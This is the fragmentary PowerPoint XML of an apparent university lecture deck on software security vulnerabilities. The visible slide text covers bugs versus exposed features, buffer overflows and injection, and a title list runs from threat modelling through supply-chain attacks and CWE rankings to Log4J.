              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFDBDD81-AB01-566C-4991-0BA85496C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583" y="5700970"/>
              <a:ext cx="1150625" cy="71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 err="1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eg</a:t>
              </a:r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SQL</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US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query</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB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5386" name="Afgeronde rechthoek 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73B1C2DB-A189-0887-B7EC-B7BA7E03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054" y="4591241"/>
              <a:ext cx="1704942" cy="144448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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15367" name="Groep 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F90E4A1-C978-6D36-0C03-62512B8A239C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1241280" y="1394280"/>
            <a:ext cx="6065280" cy="1710720"/>
            <a:chOff x="1198642" y="989203"/>
            <a:chExt cx="6685645" cy="1885754"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15370" name="Afgeronde rechthoek 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5538B2F-3BCC-9EE7-ABE4-DBBE252F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1432070"/>
              <a:ext cx="1720617" cy="14428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1800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="DejaVu Sans" charset="0"/>
                </a:rPr>
                <a:t>application</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" altLang="en-US" sz="2177" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15371" name="Picture 2" descr="C:\Users\erikpoll\Desktop\.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE7D04F8-5C93-6E8F-3D10-CDD52A515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642" y="1575184"/>
              <a:ext cx="973850" cy="97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57745AE6-78C1-F9C6-3070-6082D584B49F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2544660" y="2043193"/>
              <a:ext cx="1077767" cy="2888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373" name="TextBox 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43A142C9-6E18-F263-7692-C122CEEEE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575" y="1385624"/>
              <a:ext cx="1672928" cy="717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ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1814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altLang="en-US" sz="1814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15374" name="TextBox 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6EA1F6A-C8DB-0669-86EA-CE74C19E5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570" y="989203"/>
              <a:ext cx="2222717" cy="47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177">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>a bug !</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" altLang="en-US" sz="2177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Explosie 2 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71FA4DDA-4550-D8EB-4956-EF6E65321FC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4619242" y="2147958"/>
              <a:ext cx="1217447" cy="628585"/>
            </a:xfrm>
            <a:prstGeom prst="irregularSeal2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1" tIns="45715" rIns="91431" bIns="45715"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="492074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GB"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68365DF-7975-DEBC-BBB3-8E3E8BA34D49}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4503370" y="1901921"/>
              <a:ext cx="869832" cy="536519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4A69C1A-D2A0-4F12-4082-0C7E0EACEE8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="292321" y="1012681"/>
            <a:ext cx="3129120" cy="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0" tIns="46795" rIns="89990" bIns="46795" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1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2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5pPr algn="ctr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F0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="25146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92125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en-US" sz="1814" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  1. Processing  Flaws </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1814" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15369" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BBB5388-B58A-0C18-8C13-351D8A145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881" y="2344681"/>
            <a:ext cx="2319840" cy="6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eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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buffer overflow in PDF viewer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88592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A132-5BF2-4B65-30D0-5F23089C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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> features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075F9-8F0D-89ED-96BC-0C3FE63A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ways for software to go off the rails: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457200">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the input triggers a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bug</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-457200">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the input triggers a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>feature                                                     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 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Of course, it is then a bug that this feature is exposed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>         This can be due to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>broken/missing access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>                                  or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection attacks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9900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For attackers it is easier to exploit features than bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicParenR"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1C127-4E8A-0E12-98E9-09AFE168616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03141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ss b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ngepast 1">
      <a:majorFont>
        <a:latin typeface="Arial Rounded MT Bold"/>
        <a:ea typeface="DejaVu Sans"/>
        <a:cs typeface="DejaVu Sans"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial Rounded MT Bold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41010</TotalTime>
  <Words>5229</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>1157</Paragraphs>
  <Slides>78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Aptos</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Arial Rounded MT Bold</vt:lpstr>
      <vt:lpstr>Bahnschrift</vt:lpstr>
      <vt:lpstr>Comic Sans MS</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>DejaVu Sans</vt:lpstr>
      <vt:lpstr>Ink Free</vt:lpstr>
      <vt:lpstr>Pieces NFI</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>1_Office Theme</vt:lpstr>
      <vt:lpstr>Software Security Vulnerabilities  </vt:lpstr>
      <vt:lpstr>Recap: security vulnerabilities so far</vt:lpstr>
      <vt:lpstr> Threat modelling </vt:lpstr>
      <vt:lpstr>How would you attack this website?</vt:lpstr>
      <vt:lpstr>Fun input to try</vt:lpstr>
      <vt:lpstr>Old-fashioned PHP attacks</vt:lpstr>
      <vt:lpstr>Fun files to upload </vt:lpstr>
      <vt:lpstr>Two kinds of problems: bugs vs features</vt:lpstr>
      <vt:lpstr>bug vs features</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>You do not have to attack just as customer...</vt:lpstr>
      <vt:lpstr>Overlooked attack surfaces</vt:lpstr>
      <vt:lpstr>Overlooked attack surfaces:  2-nd order attacks</vt:lpstr>
      <vt:lpstr>Example: 2nd order SQL injection</vt:lpstr>
      <vt:lpstr>Other attack vectors,  besides these input possibilities?</vt:lpstr>
      <vt:lpstr>Other attack vectors,  besides these input possibilities?</vt:lpstr>
      <vt:lpstr>Other attack vectors</vt:lpstr>
      <vt:lpstr>Closed vs Open Source code</vt:lpstr>
      <vt:lpstr>Supply chain attacks: NotPetya, MegaCart, Solarwinds, ...</vt:lpstr>
      <vt:lpstr>XZ-Utils supply chain attack (2024) </vt:lpstr>
      <vt:lpstr>npm supply chain attack (Sept 2025)</vt:lpstr>
      <vt:lpstr>Upcoming PyPi supply chain attack? (Sept 2025)</vt:lpstr>
      <vt:lpstr> SBOM </vt:lpstr>
      <vt:lpstr> SCA </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>  Classes of security vulnerabilities</vt:lpstr>
      <vt:lpstr> Classifications &amp; rankings of security flaws</vt:lpstr>
      <vt:lpstr>SANS CWE Top 25     [2021]</vt:lpstr>
      <vt:lpstr>CVE, CWE</vt:lpstr>
      <vt:lpstr>CVSS, EPSS , ...</vt:lpstr>
      <vt:lpstr>KEV list</vt:lpstr>
      <vt:lpstr>CWE Top 940 (or Top 1365?)   [Nov 2024]</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Classifications of security flaws</vt:lpstr>
      <vt:lpstr>Memory corruption? </vt:lpstr>
      <vt:lpstr>Memory corruption </vt:lpstr>
      <vt:lpstr>Injection attacks?</vt:lpstr>
      <vt:lpstr>Injection attacks</vt:lpstr>
      <vt:lpstr>Access control?  (authentication + authorisation) </vt:lpstr>
      <vt:lpstr>Access control?  (authentication + authorisation)</vt:lpstr>
      <vt:lpstr>memory corruption, injection attacks, access control / authentication</vt:lpstr>
      <vt:lpstr>The big three</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The big three</vt:lpstr>
      <vt:lpstr>tot hier</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>  INPUT problems     </vt:lpstr>
      <vt:lpstr>High level observations</vt:lpstr>
      <vt:lpstr>Attack surface for  input problems</vt:lpstr>
      <vt:lpstr>Attack surface for  input problems</vt:lpstr>
      <vt:lpstr>Terminology</vt:lpstr>
      <vt:lpstr> Understanding root causes  of  INPUT problems     </vt:lpstr>
      <vt:lpstr>Recurring themes: parsing &amp; languages</vt:lpstr>
      <vt:lpstr>Two kinds of problems: bugs vs features</vt:lpstr>
      <vt:lpstr>Buggy parsing  vs Unintended parsing</vt:lpstr>
      <vt:lpstr>Buggy parsing (1) : insecure parsing</vt:lpstr>
      <vt:lpstr>Buggy parsing (2): incorrect parsing</vt:lpstr>
      <vt:lpstr>Buggy parsing (3): unwanted parsing</vt:lpstr>
      <vt:lpstr>Typical injection attack, eg SQLi</vt:lpstr>
      <vt:lpstr>Injection attacks</vt:lpstr>
      <vt:lpstr>LDAP injection</vt:lpstr>
      <vt:lpstr>XPath injection</vt:lpstr>
      <vt:lpstr>Blind injection attacks</vt:lpstr>
      <vt:lpstr>More injection attacks</vt:lpstr>
      <vt:lpstr>More obscure injection attacks on Microsoft Office</vt:lpstr>
      <vt:lpstr>DDE warnings in Office</vt:lpstr>
      <vt:lpstr>SMB relays: Injection attacks via Windows file names</vt:lpstr>
      <vt:lpstr>Eval</vt:lpstr>
      <vt:lpstr>(De)serialisation  </vt:lpstr>
      <vt:lpstr>Deserialisation attacks in Java</vt:lpstr>
      <vt:lpstr>Deserialisation attacks in Java</vt:lpstr>
      <vt:lpstr>Log4J attack</vt:lpstr>
      <vt:lpstr>JNDI (Java Naming and Directory Interface)</vt:lpstr>
      <vt:lpstr>The Log4J attack</vt:lpstr>
      <vt:lpstr>Example data exfiltration using Log4J</vt:lpstr>
      <vt:lpstr>Social Engineering as injection attacks?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Poll, E. (Erik)</cp:lastModifiedBy>
  <cp:revision>493</cp:revision>
  <cp:lastPrinted>1601-01-01T00:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1601-01-01T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-17T06:27:45Z</dcterms:modified>
</cp:coreProperties>
</file>